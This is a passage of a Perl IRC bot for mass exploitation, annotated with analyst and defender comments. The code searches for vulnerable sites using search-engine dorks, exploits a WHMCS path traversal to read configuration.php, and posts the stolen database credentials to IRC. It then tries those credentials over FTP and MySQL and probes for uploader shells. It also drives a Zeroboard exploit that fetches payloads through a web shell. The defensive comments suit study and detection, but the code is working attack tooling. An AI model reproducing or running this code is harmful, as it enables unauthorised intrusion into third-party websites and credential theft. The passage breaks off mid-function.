  1207. &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
  1208. &msg("$chanxxx","$thumblogo $engine <=> sHeLL <=> ".$npath." (SafeMode=$safe) (OS=$os) uid=$uid ");
  1209. } else {
  1210. &msg("$admin","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
  1211. &msg("$chan","$thumblogo $engine <=> sHeLL <=> ".$crut." (SafeMode=$safe) (OS=$os) uid=$uid ");
  1212. }
  1213. &get_content($botc);sleep(1);
  1214. &get_content($botpc);sleep(1);
  1215. }
  1216. }
  1217. } exit; }
  1218. if ($count == $num-1) { &msg("$chan","$thumblogo $engine Finished for $dork "); }
  1219. }
  1220. }
  1221. }
  1222.  
  1223. sub whmcs_exploit() {
        # WHMCS routine. For each host from search_engine() it requests
        # http://<site><bug>../../../configuration.php%00 and, if the body contains
        # "db_host", parses credentials with getUserPass()/getinfo() (defined outside
        # this view), posts them to $chaninfo, and tries them against FTP and MySQL
        # through ftp_connect()/dbi_connect(). It then probes the ticket-submission
        # page ($subticket, defined elsewhere) and two fixed uploader paths.
        #
        # Defender notes (values taken from this block):
        #  - Web logs: request URIs containing "configuration.php%00" after a "../"
        #    chain; requests for /downloads/indexx.php and /templates_c/indexx.php.
        #  - File system: indexx.php in downloads/ or templates_c/.
        #  - If configuration.php was returned, treat the database credentials and
        #    any account sharing that password as disclosed and rotate them.
        #  - Mitigation (general): deny PHP execution in downloads/ and
        #    templates_c/, and keep the billing application patched.
  1224. my $chan = $_[0];
  1225. my $bug = $_[1];
  1226. my $simpan = $_[2];
  1227. my $dork = $_[3];
  1228. my $engine = $_[4];
  1229. my $count = 0;
  1230. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$whmcslogo);
  1231. my $num = scalar(@totexploit);
  1232. if ($num > 0){
  1233. foreach my $site(@totexploit){
  1234. $count++;
  1235. if ($count == $num-1) { &msg("$chan","$whmcslogo $engine Finished for $dork "); }
  1236. my $test1 = "http://".$site.$bug."../../../configuration.php%00";
  1237. my $submit = "http://".$site.$subticket;
  1238. my $html = &get_content($test1);
        # Double fork: the parent reaps the first child, the grandchild runs detached.
  1239. if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
  1240. if ($html =~ /db_host/i) {
  1241. my $userpass = &getUserPass($html); sleep(2);
  1242. my $info = &getinfo($html); sleep(2);
  1243. &msg("$chaninfo","$whmcslogo $engine <=> info [http://".$site."] $info");
  1244. my $lulz = "http://".$site;
  1245. my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = "";
  1246. if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
  1247. my $host = $2;
        # The helper results are split on the separator ":Viva-Byroe.Net:".
  1248. my @ftpu = split(":Viva-Byroe.Net:", $userpass);
  1249. my @dbic = split(":Viva-Byroe.Net:", $info);
  1250. $user = $ftpu[0]; $pass = $ftpu[1];
  1251. $user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $dbic[2];
  1252. my $ftpstat = "";
  1253. if($user =~ /_/) { @userz = split("_", $user); $user = $userz[0];}
  1254. &ftp_connect($test1,$host,$user,$pass,$chan,$engine,$whmcslogo);sleep(1);
  1255. &dbi_connect($host,$user2,$pass2,$dtbs2,$chan,$engine,$whmcslogo);sleep(1);
  1256. }
  1257. my $ceksubmit = &get_content($submit);
  1258. if ($ceksubmit =~ /Urgency/i) {
  1259. &msg("$submitchan","$whmcslogo $engine <=> Submit Ticket [".$submit."]"); sleep(2);
  1260. my $uploader = "http://".$site."/downloads/indexx.php";
  1261. my $uploader2 = "http://".$site."/templates_c/indexx.php";
  1262. my $cekup = &get_content($uploader);
  1263. my $cekup2 = &get_content($uploader2);
  1264. if ($cekup =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader."]");&msg("$admin","$whmcslogo $engine <=> Uploader [".$uploader."]"); }
  1265. if ($cekup2 =~ /enctype=\"multipart\/form-data"/i) { &msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]");&msg("$chanxxx","$whmcslogo $engine <=> Uploader [".$uploader2."]"); }
  1266. }
  1267. }
  1268. } exit;
  1269. }
  1270. }
  1271. }
  1272. }
  1273.  
  # ftp_connect($url, $host, $user, $pass, $chan, $engine, $logo)
  # Attempts an FTP login to $host with the supplied credentials and, when the
  # login succeeds, posts host, user name and password in clear text to the IRC
  # target held in the global $chanxxx. $url and $chan are accepted but unused.
  # The flag is inverted: $success starts at 1 and becomes 0 when login()
  # returns true, so 0 means "login worked".
  # NOTE(review): the return value of Net::FTP->new is not checked before
  # login() and quit() are called on it.
  # Defensive notes: in whmcs_exploit the credentials passed here come from a
  # disclosed configuration.php, so this step only works where the database
  # password is also valid for FTP. Distinct credentials per service, and FTP
  # login alerts for accounts that normally never use FTP, address it.
  1274. sub ftp_connect {
  1275. my $url = $_[0];
  1276. my $host = $_[1];
  1277. my $user = $_[2];
  1278. my $pass = $_[3];
  1279. my $chan = $_[4];
  1280. my $engine = $_[5];
  1281. my $logo = $_[6];
  1282. my $success = 1;
  1283. use Net::FTP;
  # 7-second connect/command timeout.
  1284. my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7);
  1285. $success = 0 if $ftp->login($user,$pass);
  1286. $ftp->quit;
  1287. if ($success == 0) {
  1288. &msg("$chanxxx","$logo $engine <=> FTP [http://".$host."] [".$user.":".$pass."]");
  1289. }
  1290. }
  # dbi_connect($host, $user, $pass, $dtbs, $chan, $engine, $logo)
  # Tries a remote MySQL connection to $host on TCP port 3306 with the given
  # user, password and database name, and reports "[Connected]" to the IRC
  # target in the global $chanxxx when DBI->connect returns a handle. $chan is
  # accepted but unused; the handle is not closed explicitly here.
  # Defensive notes: this check can only succeed when the database listener is
  # reachable from the internet and the account allows remote hosts. Binding
  # MySQL to localhost or firewalling 3306, and restricting the account's
  # allowed host, remove that exposure.
  1291. sub dbi_connect () {
  1292. my $host = $_[0];
  1293. my $user = $_[1];
  1294. my $pass = $_[2];
  1295. my $dtbs = $_[3];
  1296. my $chan = $_[4];
  1297. my $engine = $_[5];
  1298. my $logo = $_[6];
  1299. my $port = "3306";
  1300. my $platform = "mysql";
  # DSN layout used here: dbi:mysql:<database>:<host>:<port>
  1301. my $dsn = "dbi:$platform:$dtbs:$host:$port";
  1302. my $DBIconnect= DBI->connect($dsn,$user,$pass);
  1303. if ($DBIconnect) {
  1304. &msg("$chanxxx","$logo $engine <=> MySql [http://".$host."] [Connected]");
  1305. }
  1306. }
  # getUserPass($string)
  # Parses the text of a fetched configuration file: splits it on CRLF and, per
  # line, captures the quoted value assigned to "db_username" and "db_password"
  # (single- or double-quoted, case-insensitive). If a key appears on several
  # lines the last match wins.
  # Returns "<user>:Viva-Byroe.Net:<pass>"; either part is the empty string when
  # no matching line was found. Input that uses bare LF line endings is treated
  # as a single line by the split.
  1307. sub getUserPass() {
  1308. my $string = $_[0];
  1309. my @lol = split("\r\n", $string);
  1310. my $pass = "";
  1311. my $user = "";
  1312. foreach my $line (@lol) {
  # $3 is the text between the quotes; $1 and $2 are the filler around "=".
  1313. if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
  1314. $pass = $3;
  1315. }
  1316. if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
  1317. $user = $3;
  1318. }
  1319. }
  1320. return $user.":Viva-Byroe.Net:".$pass;
  1321. }
  1322.  
  # getinfo($string)
  # Same line-by-line parse as getUserPass, with the database name added:
  # captures the quoted values of "db_username", "db_password" and "db_name"
  # from CRLF-separated text.
  # Returns "<user>:Viva-Byroe.Net:<pass>:Viva-Byroe.Net:<dbname>"; a field is
  # empty when its key was not matched. whmcs_exploit posts this string to IRC
  # unmodified, so the separator text is also what appears in channel logs.
  1323. sub getinfo() {
  1324. my $string = $_[0];
  1325. my @lol = split("\r\n", $string);
  1326. my $pass = "";
  1327. my $user = "";
  1328. my $dbs = "";
  1329. foreach my $line (@lol) {
  1330. if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_password(.*?)=(.*?)"(.+?)";/i)) {
  1331. $pass = $3;
  1332. }
  1333. if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_username(.*?)=(.*?)"(.+?)";/i)) {
  1334. $user = $3;
  1335. }
  1336. if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_name(.*?)=(.*?)"(.+?)";/i)) {
  1337. $dbs = $3;
  1338. }
  1339. }
  1340. return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs;
  1341. }
  1342.  
  # zero_exploit($chan, $bug, $simpan, $dork, $engine)
  # Analyst summary: for every host returned by search_engine(), fetches
  # http://<host><$bug>; when the page contains "Zeroboard" it runs an external
  # helper program ./zbc against that URL, then checks whether a command
  # endpoint ($action, set outside this excerpt) answers with the marker
  # "Byroe Team". If so it requests up to three further URLs built from
  # $wgetdon / $lwpdon / $curldon (also set elsewhere) and finally looks for
  # /data/kekkaishi.php containing "stunshell", reporting SafeMode, OS and uid
  # scraped from that page to $admin and $chan.
  # $simpan is read but unused. The helper ./zbc is not part of this listing.
  # Defensive notes: a file /data/kekkaishi.php, and responses containing the
  # strings "Byroe Team" or "stunshell", are the indicators this routine itself
  # tests for. On the machine running the script, the URL is interpolated into
  # a single-string system() call and therefore passes through a shell.
  1343. sub zero_exploit() {
  1344. my $chan = $_[0];
  1345. my $bug = $_[1];
  1346. my $simpan = $_[2];
  1347. my $dork = $_[3];
  1348. my $engine = $_[4];
  1349. my $count = 0;
  1350. my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo);
  1351. my $num = scalar(@totexploit);
  1352. if ($num > 0){
  1353. foreach my $site(@totexploit){
  1354. $count++;
  1355. if ($count == $num-1) { &msg("$chan","$zerologo $engine Finished for $dork "); }
  1356. my $coba = "http://".$site.$bug;
  1357. my $cek = &get_content($coba);sleep(1);
  # Double fork, as elsewhere in this file: the work runs in a detached grandchild.
  1358. if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else {
  1359. if ($cek =~ /Zeroboard/) { system("./zbc $coba 80");sleep(1);
  1360. my $vulner1 = "http://".$site.$action."?cmd=";
  1361. my $vulner2 = "http://".$site.$action.$wgetdon;
  1362. my $vulner3 = "http://".$site.$action.$lwpdon;
  1363. my $vulner4 = "http://".$site.$action.$curldon;
  1364. my $vuln1 = "http://".$site."/data/kekkaishi.php";
  1365. my $check2 = &get_content($vulner1);
  1366. if ($check2 =~ /Byroe Team/) {
  # Each of the three requests is gated by its own global on/off flag.
  1367. if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); }
  1368. if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); }
  1369. if ($zerocurl == 1) { my $coba3 = &get_content($vulner4);sleep(2); }
  1370. my $check1 = &get_content($vuln1);
  1371. if ($check1 =~ /stunshell/i) {
  # Values are scraped from the HTML of the fetched page.
  1372. my $safe = ""; my $os = ""; my $uid = "";
  1373. if ($check1 =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
  1374. if ($check1 =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
  1375. if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
  1376. &msg("$admin","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
  1377. &msg("$chan","$zerologo $engine <=> sHeLL <=> ".$vuln1." (SafeMode=$safe) (OS=$os) uid=$uid ");
  1378. } else {
  1379. &msg("$chan","$zerologo $engine <=> Cek dewe $vulner1 ");
  1380. } sleep(2);
  1381. }
  1382. }
  1383. } exit; }
  1384. }
  1385. }
  1386. }
  1387.  
  1388. ##################################################################################
  1389.  
  # search_engine($chan, $bug, $dork, $engine, $logo)
  # Dispatches one search query to the scraper selected by the exact,
  # case-sensitive $engine string and returns the de-duplicated result list.
  #   - "JacK<TLD>" names are honoured only when the global $gps is 1; they
  #     append "+site:<tld>" to $dork and call one of jack1..jack5.
  #   - "GooGLe" is always honoured.
  #   - The remaining engine names are honoured only when $gps2 is 1.
  # An $engine value that matches nothing yields an empty list.
  # Unless the global $silentmode is non-zero, the raw and cleaned counts are
  # posted to $chan. $bug is read but not used in this body.
  # $gps, $gps2 and $silentmode are set outside this excerpt.
  1390. sub search_engine() {
  1391. my (@total,@clean);
  1392. my $chan = $_[0];
  1393. my $bug = $_[1];
  1394. my $dork = $_[2];
  1395. my $engine = $_[3];
  1396. my $logo = $_[4];
  1397. if ($gps == 1) {
  # The forty TLD variants are spread round-robin over jack1..jack5.
  1398. if ($engine eq "JacKAE") { my @jackae = &jack1($dork."+site:ae"); push(@total,@jackae); }
  1399. if ($engine eq "JacKAR") { my @jackar = &jack2($dork."+site:ar"); push(@total,@jackar); }
  1400. if ($engine eq "JacKAT") { my @jackat = &jack3($dork."+site:at"); push(@total,@jackat); }
  1401. if ($engine eq "JacKAU") { my @jackau = &jack4($dork."+site:au"); push(@total,@jackau); }
  1402. if ($engine eq "JacKBR") { my @jackbr = &jack5($dork."+site:br"); push(@total,@jackbr); }
  1403. if ($engine eq "JacKCA") { my @jackca = &jack1($dork."+site:ca"); push(@total,@jackca); }
  1404. if ($engine eq "JacKCL") { my @jackcl = &jack2($dork."+site:cl"); push(@total,@jackcl); }
  1405. if ($engine eq "JacKCN") { my @jackcn = &jack3($dork."+site:cn"); push(@total,@jackcn); }
  1406. if ($engine eq "JacKCoM") { my @jackcom = &jack4($dork."+site:com"); push(@total,@jackcom); }
  1407. if ($engine eq "JacKCZ") { my @jackcz = &jack5($dork."+site:cz"); push(@total,@jackcz); }
  1408. if ($engine eq "JacKDE") { my @jackde = &jack1($dork."+site:de"); push(@total,@jackde); }
  1409. if ($engine eq "JacKDK") { my @jackdk = &jack2($dork."+site:dk"); push(@total,@jackdk); }
  1410. if ($engine eq "JacKES") { my @jackes = &jack3($dork."+site:es"); push(@total,@jackes); }
  1411. if ($engine eq "JacKEU") { my @jackeu = &jack4($dork."+site:eu"); push(@total,@jackeu); }
  1412. if ($engine eq "JacKFR") { my @jackfr = &jack5($dork."+site:fr"); push(@total,@jackfr); }
  1413. if ($engine eq "JacKHU") { my @jackhu = &jack1($dork."+site:hu"); push(@total,@jackhu); }
  1414. if ($engine eq "JacKID") { my @jackid = &jack2($dork."+site:id"); push(@total,@jackid); }
  1415. if ($engine eq "JacKIL") { my @jackil = &jack3($dork."+site:il"); push(@total,@jackil); }
  1416. if ($engine eq "JacKIN") { my @jackin = &jack4($dork."+site:in"); push(@total,@jackin); }
  1417. if ($engine eq "JacKInfO") { my @jackinfo = &jack5($dork."+site:info"); push(@total,@jackinfo); }
  1418. if ($engine eq "JacKIR") { my @jackir = &jack1($dork."+site:ir"); push(@total,@jackir); }
  1419. if ($engine eq "JacKIT") { my @jackit = &jack2($dork."+site:it"); push(@total,@jackit); }
  1420. if ($engine eq "JacKJP") { my @jackjp = &jack3($dork."+site:jp"); push(@total,@jackjp); }
  1421. if ($engine eq "JacKKR") { my @jackkr = &jack4($dork."+site:kr"); push(@total,@jackkr); }
  1422. if ($engine eq "JacKMX") { my @jackmx = &jack5($dork."+site:mx"); push(@total,@jackmx); }
  1423. if ($engine eq "JacKMY") { my @jackmy = &jack1($dork."+site:my"); push(@total,@jackmy); }
  1424. if ($engine eq "JacKNeT") { my @jacknet = &jack2($dork."+site:net"); push(@total,@jacknet); }
  1425. if ($engine eq "JacKNL") { my @jacknl = &jack3($dork."+site:nl"); push(@total,@jacknl); }
  1426. if ($engine eq "JacKOrG") { my @jackorg = &jack4($dork."+site:org"); push(@total,@jackorg); }
  1427. if ($engine eq "JacKPH") { my @jackph = &jack5($dork."+site:ph"); push(@total,@jackph); }
  1428. if ($engine eq "JacKPL") { my @jackpl = &jack1($dork."+site:pl"); push(@total,@jackpl); }
  1429. if ($engine eq "JacKRO") { my @jackro = &jack2($dork."+site:ro"); push(@total,@jackro); }
  1430. if ($engine eq "JacKRU") { my @jackru = &jack3($dork."+site:ru"); push(@total,@jackru); }
  1431. if ($engine eq "JacKTH") { my @jackth = &jack4($dork."+site:th"); push(@total,@jackth); }
  1432. if ($engine eq "JacKUA") { my @jackua = &jack5($dork."+site:ua"); push(@total,@jackua); }
  1433. if ($engine eq "JacKUK") { my @jackuk = &jack1($dork."+site:uk"); push(@total,@jackuk); }
  1434. if ($engine eq "JacKUS") { my @jackus = &jack2($dork."+site:us"); push(@total,@jackus); }
  1435. if ($engine eq "JacKSI") { my @jacksi = &jack3($dork."+site:si"); push(@total,@jacksi); }
  1436. if ($engine eq "JacKBE") { my @jackbe = &jack4($dork."+site:be"); push(@total,@jackbe); }
  1437. if ($engine eq "JacKBIZ") { my @jackbiz = &jack5($dork."+site:biz"); push(@total,@jackbiz); }
  1438. }
  1439. if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
  1440. if ($gps2 == 1) {
  1441. if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
  1442. if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
  1443. if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
  1444. if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
  1445. if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
  1446. if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); }
  1447. if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty); }
  1448. if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
  1449. if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
  1450. if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
  1451. if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
  1452. if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam); }
  1453. if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }
  1454. }
  # clean() collapses repeated slashes and drops duplicates, keeping first-seen order.
  1455. @clean = &clean(@total);
  1456. if ($silentmode == 0) {
  1457. &msg("$chan","$logo $engine <=> Total: [".scalar(@total)."] Clean: [".scalar(@clean)."] "); }
  1458. return @clean;
  1459. }
  1460. ##################################################################################
  # isFound($link, $reqexp)
  # Fetches $link with get_content() and returns 1 when the body matches
  # $reqexp, otherwise 0. $reqexp is interpolated into the match as a regular
  # expression, not as a literal string, so metacharacters in it are active.
  1461. sub isFound() {
  1462. my $status = 0;
  1463. my $link = $_[0];
  1464. my $reqexp = $_[1];
  1465. my $res = &get_content($link);
  1466. if ($res =~ /$reqexp/) { $status = 1 }
  1467. return $status;
  1468. }
  1469.  
  # get_content($url)
  # Issues one HTTP GET through LWP::UserAgent and returns the response body.
  # The User-Agent string ($uagent) and timeout ($timot) are globals set outside
  # this excerpt. The status code is not inspected: the content of an error
  # response is returned just like that of a successful one, so callers decide
  # purely by matching text in the body.
  1470. sub get_content() {
  1471. my $url = $_[0];
  1472. my $ua = LWP::UserAgent->new(agent => $uagent);
  1473. $ua->timeout($timot);
  1474. my $req = HTTP::Request->new(GET => $url);
  1475. my $res = $ua->request($req);
  1476. return $res->content;
  1477. }
  1478. ######################################### SEARCH ENGINE
  1479.  
  # jack1($key)
  # Result scraper. Builds the query from the global $jack1 (a URL prefix set
  # outside this excerpt) plus the URI-escaped $key, and requests offsets
  # 0..1000 in steps of 100, i.e. 11 requests per call. From each page it takes
  # hrefs of the form /url?q=http://..., skips any that contain "google", and
  # expands each hit through links() into link/host/directory variants.
  # Returns the accumulated list (duplicates are removed later by clean()).
  1480. sub jack1() {
  1481. my @list;
  1482. my $key = $_[0];
  1483. for (my $i=0; $i<=1000; $i+=100){
  1484. my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
  1485. my $res = &search_engine_query($search);
  1486. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1487. my $link = $1;
  1488. if ($link !~ /google/){
  1489. my @grep = &links($link);
  1490. push(@list,@grep);
  1491. }
  1492. }
  1493. }
  1494. return @list;
  1495. }
  1496.  
  # jack2($key)
  # Result scraper using the global URL prefix $jack2 (set outside this
  # excerpt). Requests offsets 0..1000 in steps of 100 (11 requests), extracts
  # hrefs of the form /url?q=http://..., skips those containing "google", and
  # expands each hit through links(). Returns the accumulated list.
  1497. sub jack2() {
  1498. my @list;
  1499. my $key = $_[0];
  1500. for (my $i=0; $i<=1000; $i+=100){
  1501. my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
  1502. my $res = &search_engine_query($search);
  1503. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1504. my $link = $1;
  1505. if ($link !~ /google/){
  1506. my @grep = &links($link);
  1507. push(@list,@grep);
  1508. }
  1509. }
  1510. }
  1511. return @list;
  1512. }
  1513.  
  # jack3($key)
  # Result scraper using the global URL prefix $jack3 (set outside this
  # excerpt). Requests offsets 0..1000 in steps of 100 (11 requests), extracts
  # hrefs of the form /url?q=http://..., skips those containing "google", and
  # expands each hit through links(). Returns the accumulated list.
  1514. sub jack3() {
  1515. my @list;
  1516. my $key = $_[0];
  1517. for (my $i=0; $i<=1000; $i+=100){
  1518. my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
  1519. my $res = &search_engine_query($search);
  1520. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1521. my $link = $1;
  1522. if ($link !~ /google/){
  1523. my @grep = &links($link);
  1524. push(@list,@grep);
  1525. }
  1526. }
  1527. }
  1528. return @list;
  1529. }
  1530.  
  # jack4($key)
  # Result scraper using the global URL prefix $jack4 (set outside this
  # excerpt). Requests offsets 0..1000 in steps of 100 (11 requests), extracts
  # hrefs of the form /url?q=http://..., skips those containing "google", and
  # expands each hit through links(). Returns the accumulated list.
  1531. sub jack4() {
  1532. my @list;
  1533. my $key = $_[0];
  1534. for (my $i=0; $i<=1000; $i+=100){
  1535. my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
  1536. my $res = &search_engine_query($search);
  1537. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1538. my $link = $1;
  1539. if ($link !~ /google/){
  1540. my @grep = &links($link);
  1541. push(@list,@grep);
  1542. }
  1543. }
  1544. }
  1545. return @list;
  1546. }
  1547.  
  # jack5($key)
  # Result scraper using the global URL prefix $jack5 (set outside this
  # excerpt). Requests offsets 0..1000 in steps of 100 (11 requests), extracts
  # hrefs of the form /url?q=http://..., skips those containing "google", and
  # expands each hit through links(). Returns the accumulated list.
  1548. sub jack5() {
  1549. my @list;
  1550. my $key = $_[0];
  1551. for (my $i=0; $i<=1000; $i+=100){
  1552. my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
  1553. my $res = &search_engine_query($search);
  1554. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1555. my $link = $1;
  1556. if ($link !~ /google/){
  1557. my @grep = &links($link);
  1558. push(@list,@grep);
  1559. }
  1560. }
  1561. }
  1562. return @list;
  1563. }
  1564.  
  # google($key)
  # Result scraper with a hard-coded www.google.com search URL (num=100,
  # filter=0). Requests offsets 0..1000 in steps of 100 (11 requests), extracts
  # hrefs of the form /url?q=http://..., skips those containing "google", and
  # expands each hit through links(). Returns the accumulated list.
  # Only plain-http result links are matched by the pattern.
  1565. sub google() {
  1566. my @list;
  1567. my $key = $_[0];
  1568. for (my $i=0; $i<=1000; $i+=100){
  1569. my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
  1570. my $res = &search_engine_query($search);
  1571. while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  1572. my $link = $1;
  1573. if ($link !~ /google/){
  1574. my @grep = &links($link);
  1575. push(@list,@grep);
  1576. }
  1577. }
  1578. }
  1579. return @list;
  1580. }
  1581.  
  # walla($key)
  # Result scraper for search.walla.co.il: requests pages 0..100 (101 requests),
  # extracts http:// hrefs that are followed by a title attribute, skips those
  # on walla.co.il, and expands each hit through links().
  # The loop counter $b is not declared with "my" here, so it is the package
  # variable $b. Returns the accumulated list.
  1582. sub walla() {
  1583. my @list;
  1584. my $key = $_[0];
  1585. for ($b=0; $b<=100; $b+=1) {
  1586. my $search = ("http://search.walla.co.il/?q=".uri_escape($key)."&type=text&page=".$b);
  1587. my $res = &search_engine_query($search);
  1588. while ($res =~ m/<a href=\"http:\/\/(.+?)\" title=/g) {
  1589. my $link = $1;
  1590. if ($link !~ /walla\.co\.il/){
  1591. my @grep = &links($link);
  1592. push(@list,@grep);
  1593. }
  1594. }
  1595. }
  1596. return @list;
  1597. }
  1598.  
  # yahoo($key)
  # Result scraper for search.yahoo.com: requests offsets b=1..991 in steps of
  # 10 (100 requests), extracts targets that appear percent-encoded as
  # "http%3a//..." up to the next double quote, skips those containing
  # yahoo.com, and expands each hit through links().
  # $b is the undeclared package variable. Returns the accumulated list.
  1599. sub yahoo(){
  1600. my @list;
  1601. my $key = $_[0];
  1602. for ($b=1; $b<=1000; $b+=10) {
  1603. my $search = ("http://search.yahoo.com/search?p=".uri_escape($key)."&b=".$b);
  1604. my $res = &search_engine_query($search);
  1605. while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
  1606. my $link = $1;
  1607. if ($link !~ /yahoo\.com/){
  1608. my @grep = &links($link);
  1609. push(@list,@grep);
  1610. }
  1611. }
  1612. }
  1613. return @list;
  1614. }
  1615.  
  # ask($key)
  # Result scraper for uk.ask.com: requests page values 1..901 in steps of 100
  # (10 requests) with a fixed qid parameter, extracts http:// hrefs that are
  # followed by an onmousedown attribute, skips those on ask.com, and expands
  # each hit through links(). Returns the accumulated list.
  1616. sub ask() {
  1617. my @list;
  1618. my $key = $_[0];
  1619. for (my $i=1; $i<=1000; $i+=100) {
  1620. my $search = ("http://uk.ask.com/web?q=".uri_escape($key)."&qsrc=1&frstpgo=0&o=0&l=dir&qid=05D10861868F8C7817DAE9A6B4D30795&page=".$i."&jss=");
  1621. my $res = &search_engine_query($search);
  1622. while ($res =~ m/href=\"http:\/\/(.*?)\" onmousedown=/g) {
  1623. my $link = $1;
  1624. if ($link !~ /ask\.com/){
  1625. my @grep = &links($link);
  1626. push(@list,@grep);
  1627. }
  1628. }
  1629. }
  1630. return @list;
  1631. }
  1632.  
  # onet($key)
  # Result scraper for szukaj.onet.pl: the page offset is part of the URL path
  # ("<b>,query.html"); offsets 1..391 in steps of 10 are requested (40
  # requests). Extracts http:// hrefs, skips any containing "onet", "webcache"
  # or "query", and expands each hit through links().
  # Returns the accumulated list.
  1633. sub onet() {
  1634. my @list;
  1635. my $key = $_[0];
  1636. my $b = 0;
  1637. for ($b=1; $b<=400; $b+=10) {
  1638. my $search = ("http://szukaj.onet.pl/".$b.",query.html?qt=".uri_escape($key));
  1639. my $res = &search_engine_query($search);
  1640. while ($res =~ m/<a href=\"http:\/\/(.*?)\">/g) {
  1641. my $link = $1;
  1642. if ($link !~ /onet|webcache|query/){
  1643. my @grep = &links($link);
  1644. push(@list,@grep);
  1645. }
  1646. }
  1647. }
  1648. return @list;
  1649. }
  1650.  
  # clusty($key)
  # Result scraper for search.yippy.com (the "clusty" project parameters are
  # hard-coded in the URL). The counter starts at 10 and steps by 10 up to 200.
  # Extracts http:// hrefs, skips those on yippy.com, and expands each hit
  # through links(). Returns the accumulated list.
  1651. sub clusty() {
  1652. my @list;
  1653. my $key = $_[0];
  1654. my $b = 0;
  1655. for ($b=10; $b<=200; $b+=10) {
  1656. my $search = ("http://search.yippy.com/search?input-form=clusty-simple&v%3Asources=webplus-ns-aaf&v%3Aproject=clusty&query=".uri_escape($key)."&v:state=root|root-".$b."-20|0&");
  1657. my $res = &search_engine_query($search);
  # When the page does not contain "next" the counter is set to 100; the loop
  # bound is 200, so this repositions the counter rather than ending the loop.
  1658. if ($res !~ /next/) {$b=100;}
  1659. while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
  1660. my $link = $1;
  1661. if ($1 !~ /yippy\.com/){
  1662. my @grep = &links($link);
  1663. push(@list,@grep);
  1664. }
  1665. }
  1666. }
  1667. return @list;
  1668. }
  1669.  
  # bing($key)
  # Result scraper for www.bing.com: requests first=1..391 in steps of 10 (40
  # requests), extracts http:// hrefs (opening quote optional), and expands each
  # hit through links(). The exclusion test here is for "google", so links that
  # point back to the search engine's own domain are not filtered out.
  # Returns the accumulated list.
  1670. sub bing() {
  1671. my @list;
  1672. my $key = $_[0];
  1673. for (my $i=1; $i<=400; $i+=10) {
  1674. my $search = ("http://www.bing.com/search?q=".uri_escape($key)."&first=".$i);
  1675. my $res = &search_engine_query($search);
  1676. while ($res =~ m/<a href=\"?http:\/\/([^\"]*)\"/g) {
  1677. my $link = $1;
  1678. if ($link !~ /google/) {
  1679. my @grep = &links($link);
  1680. push(@list,@grep);
  1681. }
  1682. }
  1683. }
  1684. return @list;
  1685. }
  1686.  
  # sapo($key)
  # Result scraper for pesquisa.sapo.pt: requests pages 1..50, extracts http://
  # hrefs, skips those under .sapo.pt, and expands each hit through links().
  # $b is the undeclared package variable. Returns the accumulated list.
  1687. sub sapo(){
  1688. my @list;
  1689. my $key = $_[0];
  1690. for ($b=1; $b<=50; $b+=1) {
